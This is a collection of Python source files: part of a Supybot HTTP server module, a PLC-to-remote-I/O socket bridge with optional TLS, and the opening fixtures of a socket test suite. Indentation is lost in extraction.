plugins = '<ul class="plugins"><li>%s</li></ul>' % '</li><li>'.join(
['<a href="/%s/">%s</a>' % (x,y.name) for x,y in plugins])
response = get_template('index.html') % {'list': plugins}
if minisix.PY3:
response = response.encode()
handler.send_response(200)
self.send_header('Content-Type', 'text/html; charset=utf-8')
self.send_header('Content-Length', len(response))
self.end_headers()
if write_content:
self.wfile.write(response)
class Static(SupyHTTPServerCallback):
"""Serves static files."""
fullpath = True
name = 'static'
defaultResponse = _('Request not handled')
def __init__(self, mimetype='text/plain; charset=utf-8'):
super(Static, self).__init__()
self._mimetype = mimetype
def doGetOrHead(self, handler, path, write_content):
response = get_template(path)
if minisix.PY3:
response = response.encode()
handler.send_response(200)
self.send_header('Content-type', self._mimetype)
self.send_header('Content-Length', len(response))
self.end_headers()
if write_content:
self.wfile.write(response)
class Favicon(SupyHTTPServerCallback):
"""Services the favicon.ico file to browsers."""
name = 'favicon'
defaultResponse = _('Request not handled')
def doGetOrHead(self, handler, path, write_content):
response = None
file_path = conf.supybot.servers.http.favicon()
if file_path:
try:
icon = open(file_path, 'rb')
response = icon.read()
except IOError:
pass
finally:
icon.close()
if response is not None:
# I have no idea why, but this headers are already sent.
# filename = file_path.rsplit(os.sep, 1)[1]
# if '.' in filename:
# ext = filename.rsplit('.', 1)[1]
# else:
# ext = 'ico'
# self.send_header('Content-Length', len(response))
# self.send_header('Content-type', 'image/' + ext)
# self.end_headers()
if write_content:
self.wfile.write(response)
else:
response = _('No favicon set.')
if minisix.PY3:
response = response.encode()
handler.send_response(404)
self.send_header('Content-type', 'text/plain; charset=utf-8')
self.send_header('Content-Length', len(response))
self.end_headers()
if write_content:
self.wfile.write(response)
class SupyWellKnown(SupyHTTPServerCallback):
"""Serves /.well-known/ resources."""
name = 'well-known'
defaultResponse = _('Request not handled')
def doGetOrHead(self, handler, path, write_content):
for callback in handler.server.callbacks.values():
resp = callback.doWellKnown(handler, path)
if resp:
(status, headers, content) = resp
handler.send_response(status)
for header in headers.items():
self.send_header(*header)
self.end_headers()
if write_content:
self.wfile.write(content)
return
handler.send_response(404)
self.end_headers()
DEFAULT_CALLBACKS = {'.well-known': SupyWellKnown()}
class RealSupyHTTPServer(HTTPServer):
# TODO: make this configurable
timeout = 0.5
running = False
def __init__(self, address, protocol, callback):
self.protocol = protocol
if protocol == 4:
self.address_family = socket.AF_INET
elif protocol == 6:
self.address_family = socket.AF_INET6
else:
raise AssertionError(protocol)
HTTPServer.__init__(self, address, callback)
self.callbacks = DEFAULT_CALLBACKS.copy()
def server_bind(self):
if self.protocol == 6:
v = conf.supybot.servers.http.singleStack()
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, v)
HTTPServer.server_bind(self)
def hook(self, subdir, callback):
if subdir in self.callbacks:
log.warning(('The HTTP subdirectory `%s` was already hooked but '
'has been claimed by another plugin (or maybe you '
'reloaded the plugin and it didn\'t properly unhook. '
'Forced unhook.') % subdir)
self.callbacks[subdir] = callback
callback.doHook(self, subdir)
def unhook(self, subdir):
callback = self.callbacks.pop(subdir, None)
if callback:
callback.doUnhook(self)
return callback
def __str__(self):
return 'server at %s %i' % self.server_address[0:2]
class TestSupyHTTPServer(RealSupyHTTPServer):
def __init__(self, *args, **kwargs):
self.callbacks = {}
def serve_forever(self, *args, **kwargs):
pass
def shutdown(self, *args, **kwargs):
pass
if world.testing:
SupyHTTPServer = TestSupyHTTPServer
else:
SupyHTTPServer = RealSupyHTTPServer
http_servers = []
def startServer():
"""Starts the HTTP server. Shouldn't be called from other modules.
The callback should be an instance of a child of SupyHTTPServerCallback."""
global http_servers
addresses4 = [(4, (x, configGroup.port()))
for x in configGroup.hosts4() if x != '']
addresses6 = [(6, (x, configGroup.port()))
for x in configGroup.hosts6() if x != '']
http_servers = []
for protocol, address in (addresses4 + addresses6):
server = SupyHTTPServer(address, protocol, SupyHTTPRequestHandler)
Thread(target=server.serve_forever, name='HTTP Server').start()
http_servers.append(server)
log.info('Starting HTTP server: %s' % str(server))
def stopServer():
"""Stops the HTTP server. Should be run only from this module or from
when the bot is dying (ie. from supybot.world)"""
global http_servers
for server in http_servers:
log.info('Stopping HTTP server: %s' % str(server))
server.shutdown()
server = None
if configGroup.keepAlive():
startServer()
def hook(subdir, callback):
"""Sets a callback for a given subdir."""
if not http_servers:
startServer()
assert isinstance(http_servers, list)
for server in http_servers:
server.hook(subdir, callback)
def unhook(subdir):
"""Unsets the callback assigned to the given subdir, and return it."""
global http_servers
assert isinstance(http_servers, list)
for server in list(http_servers):
server.unhook(subdir)
if len(set(server.callbacks) - set(DEFAULT_CALLBACKS)) <= 0 \
and not configGroup.keepAlive():
server.shutdown()
http_servers.remove(server)
|
bridge.py
|
"""
This module contains the Bridge class.
"""
import socket
import ssl
from multiprocessing import Process
from struct import unpack
from threading import Thread
from typing import Tuple
from config import Config
CONNECTION_TIMEOUT = 15
HEADER_SIZE = 6
MAX_PACKET_SIZE = 1024
class Bridge(Process):
"""
A single bridge that manages the connection between 2 devices.
"""
def __init__(self, context: Config):
super(Bridge, self).__init__()
self.cfg = context
self.name = 'Bridge-' + self.cfg.name
self.sock_plc = None
self.conn_plc = None
self.sock_io = None
self.ssock_io = None
self.ssl_context = None
self.conn_start = None
self.start()
def run(self) -> None:
print('[{}] Starting... '.format(self.name))
self._init_connections()
self._start_connection_handler()
while True:
message = self.cfg.q_manage_in.get()
if message == 'END':
self._close_connections()
return
else:
print('[{}] Unknown message: {}'.format(self.name, message))
def _close_connections(self) -> None:
if self.conn_plc is not None:
self.conn_plc.close()
if self.sock_plc is not None:
self.sock_plc.close()
if self.sock_io is not None:
self.sock_io.close()
print('[{}] connections closed!'.format(self.name))
def _error(self) -> None:
self._close_connections()
self.cfg.q_manage_out.put('Error')
exit(1)
@staticmethod
def _check_msg(msg: bytes) -> None:
if msg == b'':
raise Exception('connection closed')
return msg
def _start_connection_handler(self) -> None:
def handle_plc_incoming() -> None:
self.ssock_io.settimeout(self.cfg.timeout)
self.conn_plc.settimeout(self.cfg.timeout)
try:
while True:
# recv from plc and send to io
msg = Bridge._get_message(self.conn_plc)
# print('PLC:', msg)
msg = self._check_msg(msg)
self._send_message(msg, 'remoteIO')
# recv from io and send to plc
msg = Bridge._get_message(self.ssock_io)
# print('IO :', msg)
msg = self._check_msg(msg)
self._send_message(msg, 'plc')
except socket.timeout:
print('[{}] Socket timed out!'.format(self.name))
self._error()
except Exception as exception:
print(exception)
self._error()
Thread(target=handle_plc_incoming).start()
@staticmethod
def _get_header(sock: socket.socket) -> Tuple[bytes, int]:
header = b''
while len(header) < HEADER_SIZE:
header += sock.recv(HEADER_SIZE - len(header))
_trans_id, _prot_id, length = unpack('!HHH', header)
return header, length
@staticmethod
def _get_payload(sock: socket.socket, length: int) -> bytes:
payload = b''
while len(payload) < length:
payload += sock.recv(length - len(payload))
return payload
@staticmethod
def _get_message(sock: socket.socket) -> bytes:
header, length = Bridge._get_header(sock)
payload = Bridge._get_payload(sock, length)
return header + payload
def _init_connections(self) -> None:
self._init_io_connection()
self._init_plc_connection()
def _init_io_connection(self) -> None:
self.sock_io = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock_io.settimeout(CONNECTION_TIMEOUT)
self.sock_io.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
if self.cfg.secure:
self._init_ssl_context()
self.ssock_io = self.ssl_context.wrap_socket(
self.sock_io, server_side=False,
server_hostname=self.cfg.io_name)
print('[{}] Connecting to remoteIO ({}:{})'.format(
self.name, self.cfg.host_io, self.cfg.port_io))
self.ssock_io.connect((self.cfg.host_io, self.cfg.port_io))
print('[{}] Connected to remoteIO in ssl using {}'.format(
self.name, self.ssock_io.version()))
else:
self.ssock_io = self.sock_io
print('[{}] Connecting to remoteIO'.format(self.name))
self.ssock_io.connect((self.cfg.host_io, self.cfg.port_io))
print('[{}] Connected to remoteIO'.format(self.name))
except socket.timeout:
print('[{}] socket timed out during connection '
'establishment!'.format(self.name))
self._error()
except Exception as exc:
print('[{}] Exception during connection '
'establishment:'.format(self.name))
print(exc)
self._error()
def _init_plc_connection(self) -> None:
try:
self.sock_plc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock_plc.settimeout(CONNECTION_TIMEOUT)
self.sock_plc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock_plc.bind(('', self.cfg.port_plc))
self.sock_plc.listen()
print('[{}] waiting for plc to connect'.format(self.name))
self.conn_plc, _addr = self.sock_plc.accept()
print('[{}] plc connected'.format(self.name))
print('[{}] connected {}:{} to localhost:{}'.format(
self.name, _addr[0], _addr[1], self.cfg.port_plc))
except socket.timeout:
print('[{}] socket timed out during connection '
'establishment!'.format(self.name))
self._error()
except Exception as exc:
print('[{}] Exception during connection establishment:')
print(exc)
self._error()
def _init_ssl_context(self) -> None:
self.ssl_context = ssl.create_default_context(
ssl.Purpose.SERVER_AUTH, cafile=self.cfg.io_cert)
self.ssl_context.load_cert_chain(
certfile=self.cfg.plc_cert, keyfile=self.cfg.plc_key)
def _send_message(self, msg: bytes, dest: str) -> None:
dest = dest.lower()
if dest == 'remoteio':
self.ssock_io.send(msg)
elif dest == 'plc':
self.conn_plc.send(msg)
else:
raise AttributeError('invalid destination')
|
test_socket.py
|
import unittest
from test import support
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import platform
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import shutil
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = socket_helper.HOST
# test unicode string and carriage return
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8')
VSOCKPORT = 1234
AIX = platform.system() == "AIX"
try:
import _socket
except ImportError:
_socket = None
def get_cid():
if fcntl is None:
return None
if not hasattr(socket, 'IOCTL_VM_SOCKETS_GET_LOCAL_CID'):
return None
try:
with open("/dev/vsock", "rb") as f:
r = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, " ")
except OSError:
return None
else:
return struct.unpack("I", r)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_j1939():
"""Check whether CAN J1939 sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_J1939)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_qipcrtr():
"""Check whether AF_QIPCRTR sockets are supported on this host."""
try:
s = socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
"""Check whether AF_VSOCK sockets are supported on this host."""
ret = get_cid() is not None
return ret
def _have_socket_bluetooth():
"""Check whether AF_BLUETOOTH sockets are supported on this host."""
try:
# RFCOMM is supported by all platforms with bluetooth support. Windows
# does not support omitting the protocol.
s = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM)
except (AttributeError, OSError):
return False
else:
s.close()
return True
@contextlib.contextmanager
def socket_setdefaulttimeout(timeout):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(timeout)
yield
finally:
socket.setdefaulttimeout(old_timeout)
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_CAN_J1939 = _have_socket_can_j1939()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_QIPCRTR = _have_socket_qipcrtr()
HAVE_SOCKET_VSOCK = _have_socket_vsock()
HAVE_SOCKET_UDPLITE = hasattr(socket, "IPPROTO_UDPLITE")
HAVE_SOCKET_BLUETOOTH = _have_socket_bluetooth()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = socket_helper.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = socket_helper.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPLITETest(SocketUDPTest):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
self.port = socket_helper.bind_port(self.serv)
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ip link set up vcan0
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Must use native not standard types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = socket_helper.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp().
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.wait_threads = threading_helper.wait_threads_exit()
self.wait_threads.__enter__()
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
self.wait_threads.__exit__(None, None, None)
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
try:
self.clientSetUp()
except BaseException as e:
self.queue.put(e)
self.clientTearDown()
return
finally:
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class ThreadedUDPLITESocketTest(SocketUDPLITETest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPLITETest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
"This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.serv.close)
self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
self.serv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.serv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
time.sleep(0.1)
self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
cid = get_cid()
self.cli.connect((cid, VSOCKPORT))
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
try:
self.serv_conn.close()
self.serv_conn = None
except AttributeError:
pass
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
socket_helper.bind_unix_socket(sock, path)
self.addCleanup(os_helper.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
socket_helper.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class UDPLITETestBase(InetTestBase):
"""Base class for UDPLITE-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = socket_helper.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
class UDPLITE6TestBase(Inet6TestBase):
"""Base class for UDPLITE-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
